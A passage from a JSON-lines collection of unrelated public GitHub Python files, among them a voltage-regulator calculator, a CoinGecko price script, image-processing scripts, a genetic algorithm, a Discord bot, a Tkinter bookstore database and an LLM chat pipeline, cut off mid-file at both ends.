range(0,len(Rload)):\n if Rload[i] < VoReg/(IoMAX):\n PoAux = Rload[i]*((0.7*(Rb+Rc))/(Ra*Rc-Rb*Rload[i]))**2\n Po.append(PoAux)\n else:\n PoAux = VoReg**2/Rload[i]\n Po.append(PoAux)\n plt.plot(Rload,Po,'g')\n\ndef graphPdT2(Ri,Rf,Ra,Rb,Rc,Vcc,VoReg):\n IoCC, IoMAX, PT2MAX = calcParam(Ra,Rb,Rc,VoReg,Vcc)\n Rload = np.arange(Ri,Rf,(Rf-Ri)/100)\n PT2 = []\n for i in range(0,len(Rload)):\n if Rload[i] < VoReg/(IoMAX):\n PT2aux = (Vcc-0.7*Rload[i]*((Rb+Rc)/(Ra*Rc-Rload[i]*Rb)))*0.7*(Rb+Rc)/(Ra*Rc-Rload[i]*Rb)\n PT2.append(PT2aux)\n else:\n PT2aux = (Vcc-VoReg)*(VoReg/Rload[i])\n PT2.append(PT2aux)\n\n plt.plot(Rload,PT2,'r')\n plt.plot([VoReg/IoMAX], [(Vcc-VoReg)*(IoMAX)], 'bo',label = \"(%0.2f ohms,%0.2f Watts)\" % (VoReg/IoMAX,(Vcc-VoReg)*(IoMAX)))\n plt.plot([Rload[np.argmax(PT2)]], [PT2MAX], 'g^',label = \"(%0.2f ohms,%0.2f Watts)\" % (Rload[np.argmax(PT2)],PT2MAX))\n plt.legend()\n\ndef sensibilidades(Ra,Rb,Rc,Vcc,VoReg): # each list holds the sensitivities in the order [Ra, Rb, Rc]\n sensPd = []\n sensIocc = []\n sensIoMAX = []\n sensPd.append(-1)\n sensPd.append(((100*Vcc**2+140*Vcc+49)*Rb**2-49*Rc**2)/(10*Vcc*Rb+7*(Rb+Rc))**2)\n sensPd.append((7*Rc-10*Rb*Vcc-7*Rb)*(7*Rc+10*Rb*Vcc+7*Rb)/(10*Vcc*Rb+7*(Rb+Rc))**2)\n sensIocc.append(-1)\n sensIocc.append(Rb/(Rb+Rc))\n sensIocc.append(-Rb/(Rb+Rc))\n sensIoMAX.append(-1)\n sensIoMAX.append(Rb*(VoReg+0.7)/(Rb*(VoReg+0.7)+Rc*0.7))\n sensIoMAX.append(-Rb*(VoReg+0.7)/(Rb*(VoReg+0.7)+Rc*0.7))\n return sensPd,sensIocc,sensIoMAX\n
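\n# These are normalized sensitivities, S_x^F = (x/F)*(dF/dx): an entry of -1 says\n# the quantity is inversely proportional to that resistor (e.g. a 1% increase in\n# Ra gives roughly a 1% decrease in PdMIN, IoCC and IoMAX).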
\n\n\ndef resistorValues(VoReg,Vcc,ImaxProt):\n Ra = []\n Rb = []\n Rc = []\n RaArray = np.arange(0.5,1.05,0.05)\n RbArray = np.arange(200,2000,10)\n for i in range(0,len(RaArray)):\n if RaArray[i]>0.7/ImaxProt:\n for j in range(0,len(RbArray)):\n RcAux = RbArray[j]*((VoReg+0.7)/(ImaxProt*RaArray[i]-0.7))\n Iocc,IoMAX,PT2 = calcParam(RaArray[i],RbArray[j],RcAux,VoReg,Vcc) \n if (PT2<20) and (RbArray[j]+RcAux)>1000 and (RbArray[j]+RcAux)<10000 and RbArray[j]>600:\n Ra.append(RaArray[i])\n Rb.append(RbArray[j])\n Rc.append(RcAux)\n return Ra,Rb,Rc\n\ndef main():\n VoReg = 9\n Vcc = 15\n Ra,Rb,Rc = resistorValues(VoReg,Vcc,1.4)\n for i in range(0,len(Ra)):\n print('Combination %s' % (i))\n print(' Ra: %s ohms' % (Ra[i]))\n print(' Rb: %s ohms' % (Rb[i]))\n print(' Rc: %s ohms' % (Rc[i]))\n IoCC,IoMAX,PT2MAX = calcParam(Ra[i],Rb[i],Rc[i],VoReg,Vcc)\n print(' Iocc: %s A' % (IoCC))\n print(' IoMAX: %s A' % (IoMAX))\n print(' Maximum power in T2: %s W' % (PT2MAX))\n print(' Power in Ra: %s W' % (IoMAX**2*Ra[i]))\n sensPd,sensIocc,sensIoMAX = sensibilidades(Ra[i],Rb[i],Rc[i],Vcc,VoReg)\n print(' Sensitivity of Ra in Pd: %s' % (sensPd[0]))\n print(' Sensitivity of Rb in Pd: %s' % (sensPd[1]))\n print(' Sensitivity of Rc in Pd: %s' % (sensPd[2]))\n print(' Sensitivity of Ra in Iocc: %s' % (sensIocc[0]))\n print(' Sensitivity of Rb in Iocc: %s' % (sensIocc[1]))\n print(' Sensitivity of Rc in Iocc: %s' % (sensIocc[2]))\n print(' Sensitivity of Ra in IoMAX: %s' % (sensIoMAX[0]))\n print(' Sensitivity of Rb in IoMAX: %s' % (sensIoMAX[1]))\n print(' Sensitivity of Rc in IoMAX: %s' % (sensIoMAX[2]))\n plt.figure('Vo(Io) Combination no. %s' % (i))\n graphRsweep(Ra[i],Rb[i],Rc[i],VoReg,Vcc)\n plt.yticks(np.arange(0,np.ceil(VoReg)+1,1))\n plt.grid(True,'both','both')\n plt.xlabel('Io [A]')\n plt.ylabel('Vo [V]')\n plt.figure('Pt2(Rload) Combination no. %s' % (i))\n graphPdT2(0,10,Ra[i],Rb[i],Rc[i],Vcc,VoReg)\n plt.xticks(np.arange(0,11,1))\n plt.grid(True,'both','both')\n plt.xlabel('Rload [ohms]')\n plt.ylabel('Pt2 [W]')\n plt.figure('Po(Rload) Combination no. %s' % (i))\n graphPdRl(0,10,Ra[i],Rb[i],Rc[i],Vcc,VoReg)\n plt.xticks(np.arange(0,11,1))\n plt.grid(True,'both','both')\n plt.xlabel('Rload [ohms]')\n plt.ylabel('Po [W]')\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"mlarroque/electro2-TP1","sub_path":"foldbackValuesCalculator/foldbackValuesCalculator/foldbackValuesCalculator.py","file_name":"foldbackValuesCalculator.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26279485064","text":"from pycoingecko import CoinGeckoAPI\nfrom telegram import tel_send_message\nfrom pprint import pprint\n\ncg = CoinGeckoAPI()\n\n\ndef get_prices(coin_ids: str, vs_currencies: str):\n prices = cg.get_price(\n ids=coin_ids,\n vs_currencies=vs_currencies\n )\n\n text = ''\n for k, v in prices.items():\n price = v.get('usd')\n text += f'Symbol: {k} - Price(usd): {price}'\n text += f'\\n'\n\n tel_send_message(text)\n return prices\n\n\ndef get_coin_list():\n return cg.get_coins_list()\n\n\ndef get_coins_markets(vs_currency: str):\n return cg.get_coins_markets(vs_currency)\n\n\ndef get_coin_by_id(id: str):\n return cg.get_coin_by_id(id)\n\ndef get_coin_ohlc_by_id(id: str, vs_currency: str, days:str):\n \"\"\"\n Example response:\n \t\n successful operation\n\n [\n 1594382400000 (time),\n 1.1 (open),\n 2.2 (high),\n 3.3 (low),\n 4.4 (close)\n ]\n \"\"\"\n return cg.get_coin_ohlc_by_id(id, vs_currency, days)\n\n\ndef get_global_data(decentralized=False):\n\n if decentralized:\n return cg.get_global_decentralized_finance_defi()\n \n return cg.get_global()\n\nif __name__ == '__main__':\n\n # Add as many calls here as you consider necessary.\n get_prices('bitcoin,ethereum', 'usd')\n\n # print(get_coin_list())\n #pprint(get_coins_markets('usd'))\n pprint(get_coin_by_id('bitcoin'))\n\n # Global data\n print('##########################')\n print('No DeFi Data:')\n pprint(get_global_data())\n\n print('##########################')\n print('DeFi Data')\n pprint(get_global_data(True))\n\n pprint(get_coin_ohlc_by_id('bitcoin', 'usd', '1'))","repo_name":"rmblockcode/coingecko-tutorial","sub_path":"coingecko.py","file_name":"coingecko.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41334893213","text":"#! 
/usr/bin/python3\nimport svar\nimport json\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-task\",default=\"./data/sample/task.json\",help=\"The input task json file\")\nparser.add_argument(\"-out\",default='dom.tif',help=\"The output ortho mosaic image file\")\nparser.add_argument(\"-arg\", nargs='+', action='append',default=[],help=\"the processing parameters\")\nparser.add_argument(\"-with_pose\", action=\"store_true\", help=\"Use pose stitching instead of reconstruct\")\n \nargs = parser.parse_args()\n\nsibitu=svar.load('svar_highstitch')\n\ntask=json.loads(open(args.task).read())\n\nfor it_args in args.arg:\n for arg in it_args:\n key,value= arg.split('=')\n task[\"parameters\"][key]=value\n\ntask[\"parameters\"][\"topdir\"]= os.path.dirname(args.task)\n\nos.system('rm area.txt *.tile -f')\n\nif args.with_pose:\n success=sibitu.stitch_with_pose(task,args.out)\nelse:\n success=sibitu.stitch_task(task,args.out)\nos.system('rm area.txt *.tile -f')\n\n\n","repo_name":"zdzhaoyong/highstitch","sub_path":"python/5_highstitch.py","file_name":"5_highstitch.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"29549790859","text":"import cv2 \nimport numpy as np\ncap = cv2.VideoCapture(0)\nret, img2 = cap.read()\nwhile(True):\n\n\tret, img = cap.read()\n\tkernal=np.ones((2,2),np.uint8)\n\timg1= cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\timg1 = cv2.GaussianBlur(img1,(5,5),0) \n\timg = cv2.rectangle(img, (200,80), (400,180), (255,0,0), 2)\n\t\n\timg2= cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\timg2 = cv2.GaussianBlur(img2,(5,5),0) \n\tcanny1=cv2.Canny(img1, 40, 50)\n\tcanny2=cv2.Canny(img2, 40, 50)\n\tcanny = cv2.bitwise_and(canny1, canny2)\n\tcan = cv2.getRectSubPix(canny1, (400,180), (200,80))\n\t#canny1 = cv2.bitwise_not(canny1)\n\tcanny1=cv2.line(canny1, (200,200), (310,200), (255,255,255), 1)\n\tcanny1=cv2.line(canny1, (200,235), (310,235), (255,255,255), 1)\n\tdont, contours, hierarchy = cv2.findContours(canny1, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\tcontours = filter(lambda x: cv2.contourArea(x)>500 , contours)\n\tcanny1= cv2.cvtColor(canny1, cv2.COLOR_GRAY2BGR)\n\tcv2.drawContours(canny1, contours, -1, (0, 255, 0), 1) \n\t#canny= cv2.dilate(canny, kernal, iterations=1)\n\t#img2= cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\t#diff=cv2.absdiff(img, img2)\n\t#diff= cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\t#_,diff1= cv2.threshold(diff, 100,255, cv2.THRESH_BINARY)\n\tcv2.imshow(\"diff\", canny1)\n\t#cv2.imshow(\"diffi\", can)\n\t#cv2.imshow(\"diff1\", diff1)\n\tcv2.imshow(\"img\", img)\n\n#\t_,ig= cv2.threshold(img, 75,255, cv2.THRESH_TRIANGLE)\n\t_,im= cv2.threshold(img1, 100,255, cv2.THRESH_BINARY)\n\t#cv2.imshow('im', im)\n\tcv2.imshow('ig', img1)\n\tkey = cv2.waitKey(5) \n\tif key==ord('q'): #press \"q\" key on keyboard to stop videocapture\n\t\tbreak\n\tret, img2 = cap.read()\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"shreysingla11/ITSP","sub_path":"eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31452739898","text":"from PIL import Image\nimport numpy as np \n\nim = Image.open('./lena.bmp')\nr, c = im.size\n\nerosion = np.zeros((r,c), dtype = np.int32)\nimg = np.asarray(im)\n\n\nkernel=np.array([[0,1,1,1,0],\n [1,1,1,1,1],\n [1,1,1,1,1],\n [1,1,1,1,1],\n [0,1,1,1,0]])\n\n\n\"\"\"Gray Scale Erosion: 
Minimum\"\"\"\nfor i in range(r):\n\tfor j in range(c):\n\t\ttmp = img[i][j]\n\t\tfor x in range(-2,3):\n\t\t\tif i+x < 0 or i+x >= 512:\n\t\t\t\tbreak\n\t\t\tfor y in range(-2,3):\n\t\t\t\tif j+y < 0 or j+y >= 512:\n\t\t\t\t\tbreak\n\t\t\t\tif kernel[x+2][y+2] == 1:\n\t\t\t\t\ttmp = min(tmp,img[i+x][y+j])\n\n\t\terosion[i][j] = tmp\n\nim = Image.fromarray(erosion)\nim = im.convert(\"L\")\nim.save('lena_gray_scale_erosion.bmp', format = 'BMP')\n\n\n\n\n","repo_name":"archielu/computer_vision_2021_fall","sub_path":"hw5/src/hw5b.py","file_name":"hw5b.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16543468536","text":"import numpy as np\nimport collections\nfrom Darwin import Darwin\n\n''' The genetic_algorithm class contains the functionality to train a neural network using a genetic algorithm.\n This class is a child of the Darwin superclass and provides implementations of the evolve, select_parents, \n crossover and mutate methods.'''\n\nclass genetic_algorithm(Darwin):\n def create_instance(population_size, nodes_per_layer, activation_function, problem_type):\n obj = genetic_algorithm(population_size, nodes_per_layer, activation_function, problem_type)\n\n # Assign initial variance for mutation\n for i in range(len(obj.population)):\n obj.population[i].append(np.random.uniform(0, 1))\n return obj\n\n # Perform steps of evolution (select parents, then perform crossover, then mutate).\n def evolve(self, mutation_prob, crossover_prob, k, validation_data):\n np.random.shuffle(self.population)\n\n # Select parents\n parents = self.select_parents(k, validation_data)\n offspring = []\n half_size = int(len(self.population)/2)\n\n # Perform crossover\n for i in range(half_size):\n if np.random.uniform(0, 1) < crossover_prob:\n children = self.crossover(parents[i], parents[i + half_size])\n else:\n children = collections.namedtuple('children', ['child1', 'child2'])(parents[i], parents[i + half_size])\n\n # Mutate children\n self.mutate(children.child1, mutation_prob)\n self.mutate(children.child2, mutation_prob)\n\n offspring.append(children.child1)\n offspring.append(children.child2)\n\n # Create the next generation using the fittest individuals from the parents and children\n self.replace(offspring, \"fittest\", validation_data)\n\n # Implementation of tournament based selection to choose parents, k = how many individuals compete in tournament\n def select_parents(self, k, validation_data):\n selected_individuals = []\n\n # Perform |population| tournaments\n for i in range(self.population_size):\n competitors = []\n fitness = []\n\n # Randomly select k individuals to compete in tournament\n for j in range(k):\n index = np.random.randint(0, self.population_size)\n competitors.append(self.population[index])\n fitness.append(self.fitness(self.population[index][0:-1], validation_data))\n\n # Select winner of the tournament\n winner = np.argmin(fitness)\n selected_individuals.append(competitors[winner])\n\n return selected_individuals\n\n # Mutation using normal distribution\n def mutate(self, individual, mutation_prob):\n for i in range(len(individual) - 1):\n if np.random.uniform(0, 1) < mutation_prob:\n individual[i] += np.random.normal(0, 0.5)\n\n # One point crossover\n def crossover(self, ind1, ind2):\n pt = np.random.randint(0, len(ind1))\n\n child1 = ind1[:pt] + ind2[pt:len(ind2)]\n child2 = ind2[:pt] + ind1[pt:len(ind1)]\n\n return collections.namedtuple('children', ['child1', 
\n\n\n","repo_name":"archielu/computer_vision_2021_fall","sub_path":"hw5/src/hw5b.py","file_name":"hw5b.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16543468536","text":"import numpy as np\nimport collections\nfrom Darwin import Darwin\n\n''' The genetic_algorithm class contains the functionality to train a neural network using a genetic algorithm.\n This class is a child of the Darwin superclass and provides implementations of the evolve, select_parents, \n crossover and mutate methods.'''\n\nclass genetic_algorithm(Darwin):\n def create_instance(population_size, nodes_per_layer, activation_function, problem_type):\n obj = genetic_algorithm(population_size, nodes_per_layer, activation_function, problem_type)\n\n # Assign initial variance for mutation\n for i in range(len(obj.population)):\n obj.population[i].append(np.random.uniform(0, 1))\n return obj\n\n # Perform steps of evolution (select parents, then perform crossover, then mutate).\n def evolve(self, mutation_prob, crossover_prob, k, validation_data):\n np.random.shuffle(self.population)\n\n # Select parents\n parents = self.select_parents(k, validation_data)\n offspring = []\n half_size = int(len(self.population)/2)\n\n # Perform crossover\n for i in range(half_size):\n if np.random.uniform(0, 1) < crossover_prob:\n children = self.crossover(parents[i], parents[i + half_size])\n else:\n children = collections.namedtuple('children', ['child1', 'child2'])(parents[i], parents[i + half_size])\n\n # Mutate children\n self.mutate(children.child1, mutation_prob)\n self.mutate(children.child2, mutation_prob)\n\n offspring.append(children.child1)\n offspring.append(children.child2)\n\n # Create the next generation using the fittest individuals from the parents and children\n self.replace(offspring, \"fittest\", validation_data)\n\n # Implementation of tournament based selection to choose parents, k = how many individuals compete in tournament\n def select_parents(self, k, validation_data):\n selected_individuals = []\n\n # Perform |population| tournaments\n for i in range(self.population_size):\n competitors = []\n fitness = []\n\n # Randomly select k individuals to compete in tournament\n for j in range(k):\n index = np.random.randint(0, self.population_size)\n competitors.append(self.population[index])\n fitness.append(self.fitness(self.population[index][0:-1], validation_data))\n\n # Select winner of the tournament (smallest fitness value, i.e. lowest error)\n winner = np.argmin(fitness)\n selected_individuals.append(competitors[winner])\n\n return selected_individuals\n\n # Mutation using normal distribution\n def mutate(self, individual, mutation_prob):\n for i in range(len(individual) - 1):\n if np.random.uniform(0, 1) < mutation_prob:\n individual[i] += np.random.normal(0, 0.5)\n\n # One point crossover\n def crossover(self, ind1, ind2):\n pt = np.random.randint(0, len(ind1))\n\n child1 = ind1[:pt] + ind2[pt:len(ind2)]\n child2 = ind2[:pt] + ind1[pt:len(ind1)]\n\n return collections.namedtuple('children', ['child1', 'child2'])(child1, child2)\n
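# Note: in the one-point crossover above each child takes the head of one parent\n# and the tail of the other; the mutation-variance gene appended in create_instance\n# is the last list element, so it is inherited with whichever tail contains it.\n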
","repo_name":"senecal-jjs/GA_EVOLVE_MLP","sub_path":"Genetic.py","file_name":"Genetic.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30245241780","text":"import os\nimport discord\nfrom keep_alive import keep_alive\n\nfrom commands import onMessage\n\nsecretToken = os.environ['TOKEN']\n\nbot = discord.Client()\n\n@bot.event\nasync def on_ready():\n print(\"Another Day, another adventure for the {0.user}\".format(bot))\n\n@bot.event\nasync def on_message(message):\n # Ignore messages sent by the bot itself\n if message.author == bot.user:\n return\n\n await onMessage(message)\n\n\nkeep_alive()\nbot.run(secretToken)","repo_name":"DawidDylus/CartographerBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17762412612","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom webcrawling.items import *\n\nclass MasseffectSpider(scrapy.Spider):\n name = \"massEffect\"\n allowed_domains = [\"tfaw.com\"]\n start_urls = (\n 'http://www.tfaw.com/Companies/Dark-Horse/Series?series_name=Massive',\n )\n\n def parse(self, response):\n #print (response.xpath('//a[@class=\"regularlinksmallbold product-profile-link\"]/@href').extract())\n for i in response.xpath('//a[@class=\"regularlinksmallbold product-profile-link\"]/text()').extract():\n url = response.urljoin(i)\n yield scrapy.Request(url, callback=self.parse_detail_page)\n #pass\n\n def parse_detail_page(self, response):\n \tdata = WebcrawlingItem()\n \tdata['title'] = response.xpath('//span[@class=\"blackheader\" and @itemprop=\"name\"]/text()').extract()\n \t#data['price'] = response.css('span.blackheader ~ span.redheader::text').re('[$]\\d+\\.\\d+')\n \t#data['upc'] = response.xpath('...').extract()\n \t#data['url'] = response.url\n \tyield data \n","repo_name":"ngtcs1989/Web-Scraping","sub_path":"Web_crawlers/webcrawling/spiders/massEffect.py","file_name":"massEffect.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28418936377","text":"from tkinter import *\nimport sqlite3\nfrom tkinter import ttk\n\n# Creation and sizing of the GUI\nroot = Tk()\nroot.title(\"Book Store Manager\")\nroot.geometry(\"850x350\")\nspace = Text(root)\n\n# Creating a connection to the database\nconn = sqlite3.connect('library.db')\n# Create cursor\ncur = conn.cursor()\n\n# Calling the execute() method to create table and perform SQL commands\n# Create table\ncur.execute(\"\"\"create table if not exists books (\n id integer PRIMARY KEY,\n title text,\n author text,\n year integer,\n isbn integer\n)\n\"\"\")\n# Commit Changes\nconn.commit()\n# Close connection\nconn.close()\n\nupdate_id = None\n\n\n# Create Submit Function for database\ndef addEntry():\n \"\"\"\n Adds or updates the book details to the database\n\n :return: void\n \"\"\"\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n idd = update_id\n if idd is None:\n # Insert into database\n cur.execute(\"INSERT INTO books VALUES (NULL, :title, :author, :yr, :isbn)\",\n {\n 'title': book_title.get(),\n 'author': author.get(),\n 'yr': yr.get(),\n 'isbn': isbn.get(),\n }\n )\n else:\n sql = 'update books set title= ?, author=?, year=?, isbn=? where id=?'\n cur.execute(sql, (book_title.get(), author.get(), yr.get(), isbn.get(), idd))\n\n conn.commit()\n conn.close()\n # Clear inputs from form\n clear_input()\n view_all()\n\n\ndef view_all():\n \"\"\"\n Displays all the saved books in the database\n\n :return:void\n \"\"\"\n view_table.delete(*view_table.get_children())\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n\n # Query the database\n cur.execute(\"select * from books\")\n records = cur.fetchall()\n\n for record in records:\n view_table.insert('', 'end', values=record)\n\n conn.commit()\n conn.close()\n\n\ndef delete():\n \"\"\"\n Deletes selected book from the database by id\n\n :return: void\n \"\"\"\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n selected_item = view_table.item(view_table.focus())\n delete_id = selected_item.get('values')[0]\n\n # Delete from database\n cur.execute(\"delete from books where id=?\", (delete_id,))\n conn.commit()\n conn.close()\n view_all()\n\n\ndef search():\n \"\"\"\n Prints search result according to search string and type of search.\n\n :return: void\n \"\"\"\n view_table.delete(*view_table.get_children())\n\n select = callback()\n\n if select == 'id':\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n cur.execute(\"select * from books where id=?\", (search_entry.get(),))\n results = cur.fetchall()\n for result in results:\n view_table.insert('', 'end', values=result)\n conn.commit()\n conn.close()\n else:\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n sql = str('select * from books where ' + select + ' like (?)')\n cur.execute(sql, (\"%\" + search_entry.get() + \"%\",))\n results = cur.fetchall()\n for result in results:\n view_table.insert('', 'end', values=result)\n conn.commit()\n conn.close()\n\n\ndef update():\n \"\"\"\n Places selected book in input entry to be edited\n\n :return: void\n \"\"\"\n clear_input()\n selected_item = view_table.item(view_table.focus())\n global update_id\n update_id = selected_item.get('values')[0]\n book_title.insert(0, selected_item.get('values')[1])\n author.insert(0, selected_item.get('values')[2])\n yr.insert(0, selected_item.get('values')[3])\n isbn.insert(0, selected_item.get('values')[4])\n\n\ndef clear_input():\n \"\"\"\n Clears all input from entry boxes\n :return: void\n \"\"\"\n global update_id\n book_title.delete(0, END)\n author.delete(0, END)\n yr.delete(0, END)\n isbn.delete(0, END)\n update_id = None\n\n\ndef callback(*args):\n \"\"\"\n Gets string selection from dropdown selector\n :param args:\n :return: string\n\n \"\"\"\n return opt_variable.get()\n\n\n# Create text boxes for the user entry\nbook_title = Entry(root, width=20)\nbook_title.grid(row=0, column=1, pady=10)\nauthor = Entry(root, width=20)\nauthor.grid(row=0, column=3, pady=10)\nyr = Entry(root, width=20)\nyr.grid(row=1, column=1, pady=10)\nisbn = Entry(root, width=20)\nisbn.grid(row=1, column=3, pady=10)\nsearch_entry = Entry(root, width=70)\nsearch_entry.grid(row=2, column=0, columnspan=1)\n\n# Create text box labels\nbook_title_label = Label(root, text=\"Title\")\nbook_title_label.grid(row=0, column=0, padx=30)\nauthor_label = Label(root, text=\"Author\")\nauthor_label.grid(row=0, column=2, padx=30)\nyr_label = Label(root, text=\"Year\")\nyr_label.grid(row=1, column=0, padx=30)\nisbn_label = Label(root, text=\"ISBN\")\nisbn_label.grid(row=1, column=2, padx=30)\nsearch_label = Label(root, text=\"Search by:\")\nsearch_label.grid(row=2, column=1, padx=30)\n
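\n# Note: tkinter.ttk.OptionMenu consumes its first positional value as the initial\n# selection, which is why \"id\" appears twice below: the first \"id\" is used as the\n# default and the remaining five entries become the menu items.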
\"year\",\n \"isbn\"\n]\noption_frame = Frame(root, bd=1, bg='cyan')\noption_frame.grid(row=2, column=2)\nopt_variable = StringVar(root)\nopt_variable.set('???')\nopt = ttk.OptionMenu(option_frame, opt_variable, *OptionList)\nopt.config(width=10)\nopt.pack(side=\"top\")\noption_select = 'id'\nopt_variable.trace(\"w\", callback)\n\n# Creating the execution buttons\nview_all_btn = Button(root, text=\"View all\", font=('arial', 10, 'bold'), width=15, command=view_all)\nview_all_btn.grid(row=3, column=3)\nsearch_entry_btn = Button(root, text=\"Search entry\", font=('arial', 10, 'bold'), width=15, command=search)\nsearch_entry_btn.grid(row=2, column=3)\nadd_entry_btn = Button(root, text=\"Add entry\", font=('arial', 10, 'bold'), width=15, command=addEntry)\nadd_entry_btn.grid(row=5, column=3)\nupdate_selected_btn = Button(root, text=\"Update Selected\", font=('arial', 10, 'bold'), width=15, command=update)\nupdate_selected_btn.grid(row=6, column=3)\ndelete_selected_btn = Button(root, text=\"Delete selected\", font=('arial', 10, 'bold'), width=15, command=delete)\ndelete_selected_btn.grid(row=7, column=3)\nclose_btn = Button(root, text=\"Close\", font=('arial', 10, 'bold'), width=15, command=root.destroy)\nclose_btn.grid(row=8, column=3)\n\n# Adding the display label\ndata_entry_frame = Frame(root, bd=1, width=400, height=250, bg=\"cyan\")\ndata_entry_frame.grid(row=3, rowspan=6, columnspan=3)\n\n# frm = Frame(root)\nview_table = ttk.Treeview(data_entry_frame, selectmode='browse')\nview_table.pack(side='left', fill='x')\nscrollbar = ttk.Scrollbar(data_entry_frame,\n orient=\"vertical\",\n command=view_table.yview)\nscrollbar.pack(side='right', fill='y')\nview_table.configure(xscrollcommand=scrollbar.set)\n# Defining number of columns\nview_table[\"columns\"] = (\"0\", \"1\", \"2\", \"3\", \"4\")\n# Defining heading\nview_table['show'] = 'headings'\nview_table.column(\"0\", width=10)\nview_table.column(\"3\", width=60)\n\nview_table.heading(0, text=\"Id\")\nview_table.heading(1, text=\"Title\")\nview_table.heading(2, text=\"Author\")\nview_table.heading(3, text=\"Year\")\nview_table.heading(4, text=\"Isbn\")\n\nroot.mainloop()\n","repo_name":"Chizyraky/bookstore-app","sub_path":"BookStore.py","file_name":"BookStore.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71830916906","text":"import torch\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\n\nfrom utils import Prompter\n\nclass pipeline(object):\n\n def __init__(self, model_path=None, gpu=False):\n self.model_path = model_path\n self.use_gpu = gpu\n self.prompter = Prompter()\n \n print(\"Loading model's weights ...\")\n self.load_model()\n\n def load_model(self):\n self.tokenizer = AutoTokenizer.from_pretrained(self.model_path)\n self.model = AutoModelForCausalLM.from_pretrained(\n self.model_path,\n torch_dtype=torch.bfloat16)\n \n if self.use_gpu:\n self.model.cuda()\n\n def to_cuda(self, inputs):\n return {k: v.cuda() for k, v in inputs.items()}\n\n def generate(self, instruction, prompt_input=None):\n prompt = self.prompter.generate_prompt(instruction, prompt_input)\n inputs = self.tokenizer(prompt, return_tensors='pt')\n if self.use_gpu:\n inputs = self.to_cuda(inputs)\n \n output = self.model.generate(\n **inputs,\n max_new_tokens=256,\n do_sample=True,\n top_p=0.75,\n top_k=40\n )\n output = self.tokenizer.decode(output[0], skip_special_tokens=True)\n response = self.prompter.get_response(output)\n return 
response\n","repo_name":"nlp-uoregon/Okapi","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"37"} +{"seq_id":"15416721693","text":"import imp\nfrom typing import Tuple, List\nfrom utils.util_functions import printc\nimport re\nimport os\n\ndef send_message(message: str, **kwargs) -> None:\n printc(source='[DATA SETUP WORKFLOW]', message=message, **kwargs)\n\n\n# endregion\ndef get_index_from_path(path: str) -> Tuple[int,int]:\n pattern = \"[0-9]{1,}-[0-9]{1,}\"\n x = re.findall(pattern,path)\n if len(x) != 1: send_message(f\"ERROR WHILE PARSING PATH: got {x} extracted from {path}, there should only be one\")\n\n first_index, second_index = x[0].split(\"-\")\n\n return int(first_index), int(second_index)\n\ndef get_key_of_path(path1: str) -> int:\n\n path1_i1, path1_i2 = get_index_from_path(path1)\n\n # print(f\"{path1}: {path1_i1},{path1_i2}\")\n\n return path1_i1 * 1000 + path1_i2\n\n\ndef sort_index(index: List[str]) -> List[str]:\n index.sort(key=get_key_of_path)\n return index\n\n\ndef create_index_for_dir(dir_path, index_path, file_ending = None,save=True,sort=True) -> List[str]:\n\n index = []\n\n for file in os.listdir(dir_path):\n if file_ending is not None:\n if file.endswith(file_ending):\n index.append(os.path.join(dir_path,file))\n else:\n index.append(os.path.join(dir_path,file))\n\n if sort: \n sort_index(index)\n\n if save:\n with open( index_path, 'w') as f:\n for path in index:\n f.write(\"%s\\n\" % path)\n\n return index\n","repo_name":"andfaxle/cAIsar-ai-cup","sub_path":"src/utils/path_utils.py","file_name":"path_utils.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18254609884","text":"import os\nimport copy\n\nimport openai\nfrom .evaluate import evaluate_dataset\nfrom .run_llm_code import run_llm_code\n\n\ndef get_prompt(\n df, ds, iterative=1, data_description_unparsed=None, samples=None, **kwargs\n):\n how_many = (\n \"up to 10 useful columns. Generate as many features as useful for downstream classifier, but as few as necessary to reach good performance.\"\n if iterative == 1\n else \"exactly one useful column\"\n )\n return f\"\"\"\nThe dataframe `df` is loaded and in memory. Columns are also named 